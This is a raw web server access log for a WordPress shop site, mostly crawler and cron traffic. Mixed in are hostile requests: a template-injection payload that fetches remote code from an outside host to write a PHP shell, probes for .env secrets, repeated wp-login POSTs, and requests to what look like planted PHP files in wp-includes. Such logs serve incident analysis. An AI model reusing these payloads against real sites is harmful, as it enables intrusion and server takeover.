114.119.144.15 - - [02/Sep/2026:04:02:43 -0500] "GET /?id=875849.html HTTP/1.1" 500 2704 "http://www.effefe.com?id=875849.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.122.114.193 - - [02/Sep/2026:04:03:50 -0500] "GET /wp-includes/html-api/ewsphuq/ymhpljc/fzjktc1/index.php HTTP/1.1" 200 12838 "-" "-"
114.119.137.116 - - [02/Sep/2026:04:04:51 -0500] "GET /?id=776751 HTTP/1.1" 500 - "https://effefe.com/?id=776751" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.63 - - [02/Sep/2026:04:05:37 -0500] "GET /?id=408523.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-net/ziast-zfrj-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:04:06:57 -0500] "GET /?id=744020 HTTP/1.1" 500 - "https://effefe.com/?id=744020" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:07:10 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.152.47 - - [02/Sep/2026:04:07:43 -0500] "GET /?id=444388 HTTP/1.1" 301 - "http://www.ziasteelmills.com/www-com/ziast-kaibila-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.90.185.123 - - [02/Sep/2026:04:07:45 -0500] "POST /wp-cron.php?doing_wp_cron=1788340065.8096940517425537109375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.154.166 - - [02/Sep/2026:04:07:44 -0500] "GET /?id=408523.html HTTP/1.1" 301 - "http://www.ziasteelmills.com/www-net/ziast-zfrj-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.152.47 - - [02/Sep/2026:04:07:47 -0500] "GET /?id=444388 HTTP/1.1" 200 208302 "http://www.ziasteelmills.com/www-com/ziast-kaibila-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:04:07:49 -0500] "GET /?id=408523.html HTTP/1.1" 200 208302 "http://www.ziasteelmills.com/www-net/ziast-zfrj-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:04:09:07 -0500] "GET /?id=695367.html HTTP/1.1" 500 2704 "https://effefe.com/?id=695367.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.152.47 - - [02/Sep/2026:04:11:13 -0500] "GET /?id=586598 HTTP/1.1" 500 - "http://www.effefe.com?id=586598" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:04:12:14 -0500] "GET /?id=863484 HTTP/1.1" 301 - "http://www.ziasteelmills.com/www-com/ziast-jmmcc-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.90.185.123 - - [02/Sep/2026:04:12:15 -0500] "POST /wp-cron.php?doing_wp_cron=1788340335.9412260055541992187500 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.154.166 - - [02/Sep/2026:04:12:17 -0500] "GET /?id=863484 HTTP/1.1" 500 2704 "http://www.ziasteelmills.com/www-com/ziast-jmmcc-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:04:12:49 -0500] "GET /?id=694737.html HTTP/1.1" 500 188 "http://www.boomint.cn/English/m/Vg/PkS/TyC/nG5/index.asp" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.63 - - [02/Sep/2026:04:13:20 -0500] "GET /?id=842462 HTTP/1.1" 200 208302 "http://www.effefe.com?id=842462" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.90.185.123 - - [02/Sep/2026:04:13:27 -0500] "POST /wp-cron.php?doing_wp_cron=1788340407.6728088855743408203125 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.135.63 - - [02/Sep/2026:04:14:15 -0500] "GET /?id=430805 HTTP/1.1" 500 2704 "http://www.czcrcgas.com/zhaopin/3318.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:14:20 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
196.65.151.171 - - [02/Sep/2026:04:15:37 -0500] "HEAD /.env HTTP/1.1" 403 - "-" "-"
196.65.151.171 - - [02/Sep/2026:04:15:37 -0500] "HEAD /.env HTTP/1.1" 403 - "-" "-"
196.65.151.171 - - [02/Sep/2026:04:15:39 -0500] "GET /.env HTTP/1.1" 403 199 "-" "-"
196.65.151.171 - - [02/Sep/2026:04:15:39 -0500] "GET /.env HTTP/1.1" 403 199 "-" "-"
196.65.151.171 - - [02/Sep/2026:04:15:44 -0500] "GET / HTTP/1.1" 500 2704 "-" "-"
196.65.151.171 - - [02/Sep/2026:04:15:44 -0500] "GET / HTTP/1.1" 500 2704 "-" "-"
114.119.144.15 - - [02/Sep/2026:04:17:36 -0500] "GET /four-columns-portfolio/ HTTP/1.1" 500 2704 "https://effefe.com/four-columns-portfolio/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:04:19:41 -0500] "GET /?id=512396.html HTTP/1.1" 500 2704 "http://www.effefe.com?id=512396.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:21:29 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.154.166 - - [02/Sep/2026:04:21:48 -0500] "GET /?id=999660 HTTP/1.1" 500 - "http://www.effefe.com?id=999660" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.142.39 - - [02/Sep/2026:04:22:04 -0500] "GET /?id=222185.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-net/ziast-myungja-ll8.html?59269.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.46 - - [02/Sep/2026:04:23:16 -0500] "GET /?id=585349.html HTTP/1.1" 500 188 "http://www.boomint.cn/148.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.152.47 - - [02/Sep/2026:04:24:08 -0500] "GET /portfolio/pavone/ HTTP/1.1" 500 2704 "https://effefe.com/?id=433251.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
147.182.228.55 - - [02/Sep/2026:04:24:50 -0500] "GET /shop/ HTTP/1.1" 500 2704 "https://www.google.com/search?q=effefe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
114.119.137.116 - - [02/Sep/2026:04:25:58 -0500] "GET /?id=151478.html HTTP/1.1" 500 188 "http://www.boomint.cn/289.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.116 - - [02/Sep/2026:04:26:04 -0500] "GET /portfolio/ HTTP/1.1" 500 2704 "https://effefe.com/portfolio/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.46 - - [02/Sep/2026:04:28:14 -0500] "GET /?id=456748 HTTP/1.1" 500 - "https://effefe.com/?id=456748" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:28:39 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.152.47 - - [02/Sep/2026:04:30:21 -0500] "GET /?id=408240 HTTP/1.1" 500 - "https://effefe.com/?id=408240" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.90.185.123 - - [02/Sep/2026:04:32:29 -0500] "POST /wp-cron.php?doing_wp_cron=1788341549.8115029335021972656250 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.154.166 - - [02/Sep/2026:04:32:27 -0500] "GET /news/usggN4.html HTTP/1.1" 301 - "http://www.czcrcgas.com/zhaopin/2719.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:04:32:30 -0500] "GET /news/usggN4.html HTTP/1.1" 404 99410 "http://www.czcrcgas.com/zhaopin/2719.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
154.81.166.10 - - [02/Sep/2026:04:32:49 -0500] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/archive/huo96.php&t2=file_get_contents&t3=http://www.wx-jsj.cn/pc/1.txt HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
154.81.166.10 - - [02/Sep/2026:04:32:51 -0500] "GET /runtime/archive/huo96.php HTTP/1.1" 500 188 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
114.119.142.39 - - [02/Sep/2026:04:34:35 -0500] "GET /news/dt3D6Q.html HTTP/1.1" 500 - "http://www.ziasteelmills.com/www-net/ziast-1t1d-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:35:54 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.144.15 - - [02/Sep/2026:04:36:42 -0500] "GET /lianxi/ HTTP/1.1" 500 - "http://www.effefe.com?id=316003.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
154.81.166.10 - - [02/Sep/2026:04:37:33 -0500] "GET /?tag&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/archive/huo96.php&t2=file_get_contents&t3=http://www.wx-jsj.cn/pc/1.txt HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
154.81.166.10 - - [02/Sep/2026:04:37:35 -0500] "GET /runtime/archive/huo96.php HTTP/1.1" 500 188 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
114.119.148.64 - - [02/Sep/2026:04:38:51 -0500] "GET /html/news.php?qckkPi=.docz2sFNW HTTP/1.1" 500 188 "http://www.czcrcgas.com/zhaopin/823.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:04:39:14 -0500] "GET /?id=492034 HTTP/1.1" 500 188 "http://www.idbcn.net/zhaopin/3925.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.142.39 - - [02/Sep/2026:04:40:58 -0500] "GET /html/news.php?E50DAn=.docKdn9Ay HTTP/1.1" 500 2704 "http://www.ziasteelmills.com/www-com/ziast-guardianesdeamor-ll8.html?85244.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.46 - - [02/Sep/2026:04:43:05 -0500] "GET /html/App.php?iNwVYW=.pptd4DeXZ36032516 HTTP/1.1" 500 - "http://ffazf.com/2021/06/13/%E7%94%9F%E5%AD%98%E6%89%8B%E6%B8%B8%E6%AD%BB%E4%BA%A1-%E6%97%A5%E6%9C%AC%E5%84%BF%E7%AB%A5%E6%96%B0%E6%B3%95%E6%A1%88%E8%AE%A9%E6%9C%BA%E5%99%A8%E7%8C%AB%E4%B8%AD%E6%B2%A1%E9%9D%99%E9%A6%99%E6%B4%97/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:04:43:07 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
43.135.138.128 - - [02/Sep/2026:04:46:05 -0500] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.119.148.64 - - [02/Sep/2026:04:48:10 -0500] "GET /interactive-links/ HTTP/1.1" 500 2704 "https://effefe.com/interactive-links/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.203.237.170 - - [02/Sep/2026:04:49:06 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:04:50:18 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
147.182.255.181 - - [02/Sep/2026:04:51:46 -0500] "GET / HTTP/1.1" 500 2704 "https://www.google.com/search?q=effefe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
220.181.108.169 - - [02/Sep/2026:04:56:53 -0500] "GET /portfolio/casa-con-camini/ HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
119.249.100.117 - - [02/Sep/2026:04:56:55 -0500] "GET /portfolio/casa-con-camini/ HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
119.249.100.179 - - [02/Sep/2026:04:56:58 -0500] "GET /portfolio/casa-con-camini/ HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:04:57:24 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
54.210.155.69 - - [02/Sep/2026:05:01:53 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:05:04:29 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
185.191.171.13 - - [02/Sep/2026:05:04:36 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
157.90.185.123 - - [02/Sep/2026:05:04:41 -0500] "POST /wp-cron.php?doing_wp_cron=1788343481.2810471057891845703125 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
185.191.171.15 - - [02/Sep/2026:05:04:38 -0500] "GET /project-cat/immagini-surreali/ HTTP/1.1" 200 126213 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
157.230.229.93 - - [02/Sep/2026:05:11:48 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
120.133.60.156 - - [02/Sep/2026:05:14:41 -0500] "POST /wp-login.php HTTP/1.1" 500 - "https://effefe.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:05:19:14 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:05:26:34 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.90.185.123 - - [02/Sep/2026:05:30:54 -0500] "POST /wp-cron.php?doing_wp_cron=1788345054.5961749553680419921875 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
180.163.28.143 - - [02/Sep/2026:05:30:52 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.29.212 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-content/themes/woodmart/js/scripts/global/scrollBar.min.js?ver=8.5.7 HTTP/1.1" 200 540 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.29.212 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=11.0.1 HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.29.212 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=11.0.1 HTTP/1.1" 200 4350 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.29.217 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.11.0.1 HTTP/1.1" 200 9636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.28.143 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.11.0.1 HTTP/1.1" 200 1720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.30.76 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.30.85 - - [02/Sep/2026:05:30:59 -0500] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
180.163.30.100 - - [02/Sep/2026:05:30:55 -0500] "GET / HTTP/1.1" 200 187183 "http://effefe.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.90.185.123 - - [02/Sep/2026:05:33:57 -0500] "POST /wp-cron.php?doing_wp_cron=1788345237.6239531040191650390625 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
157.230.229.93 - - [02/Sep/2026:05:33:56 -0500] "POST /wp-login.php HTTP/1.1" 200 7596 "-" "Mozilla/5.0"
43.164.196.244 - - [02/Sep/2026:05:40:56 -0500] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
157.230.229.93 - - [02/Sep/2026:05:41:13 -0500] "POST /wp-login.php HTTP/1.1" 200 7596 "-" "Mozilla/5.0"
157.90.185.123 - - [02/Sep/2026:05:41:15 -0500] "POST /wp-cron.php?doing_wp_cron=1788345675.4095239639282226562500 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
157.90.185.123 - - [02/Sep/2026:05:48:37 -0500] "POST /wp-cron.php?doing_wp_cron=1788346117.5332849025726318359375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
157.230.229.93 - - [02/Sep/2026:05:48:35 -0500] "POST /wp-login.php HTTP/1.1" 200 7596 "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:05:55:58 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:06:03:22 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:06:10:45 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
18.232.11.247 - - [02/Sep/2026:06:12:57 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.90.185.123 - - [02/Sep/2026:06:13:36 -0500] "POST /wp-cron.php?doing_wp_cron=1788347616.6647720336914062500000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
8.217.145.188 - - [02/Sep/2026:06:13:33 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
8.217.145.188 - - [02/Sep/2026:06:13:37 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:06:18:12 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
92.118.39.145 - - [02/Sep/2026:06:20:04 -0500] "GET / HTTP/1.1" 500 - "https://effefe.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.118.39.145 - - [02/Sep/2026:06:20:05 -0500] "GET / HTTP/1.1" 500 - "http://effefe.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
159.223.74.58 - - [02/Sep/2026:06:24:22 -0500] "GET /license.txt HTTP/1.1" 200 19903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
17.166.155.135 - - [02/Sep/2026:06:24:24 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.166.151.33 - - [02/Sep/2026:06:24:26 -0500] "GET /portfolio/orso-a-colori/ HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
157.230.229.93 - - [02/Sep/2026:06:25:36 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
91.92.47.82 - - [02/Sep/2026:06:25:38 -0500] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
45.58.50.172 - - [02/Sep/2026:06:25:43 -0500] "POST /wp-includes/html-api/ewsphuq/ymhpljc/fzjktc1/index.php HTTP/1.1" 200 12836 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
5.230.133.57 - - [02/Sep/2026:06:25:44 -0500] "POST /wp-includes/html-api/ewsphuq/ymhpljc/fzjktc1/index.php HTTP/1.1" 200 13563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
173.211.89.249 - - [02/Sep/2026:06:25:45 -0500] "POST /wp-includes/html-api/ewsphuq/ymhpljc/fzjktc1/.333367499025868.php?to=mouthernow1@gmx.de HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
35.212.6.56 - - [02/Sep/2026:06:29:31 -0500] "GET /ads.txt HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
35.212.6.56 - - [02/Sep/2026:06:29:34 -0500] "GET /ads.txt HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
24.144.93.79 - - [02/Sep/2026:06:30:58 -0500] "GET /wp-content/uploads/2026/08/Pavone_Effefe.jpg HTTP/1.1" 200 655511 "https://www.google.com/search?q=effefe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
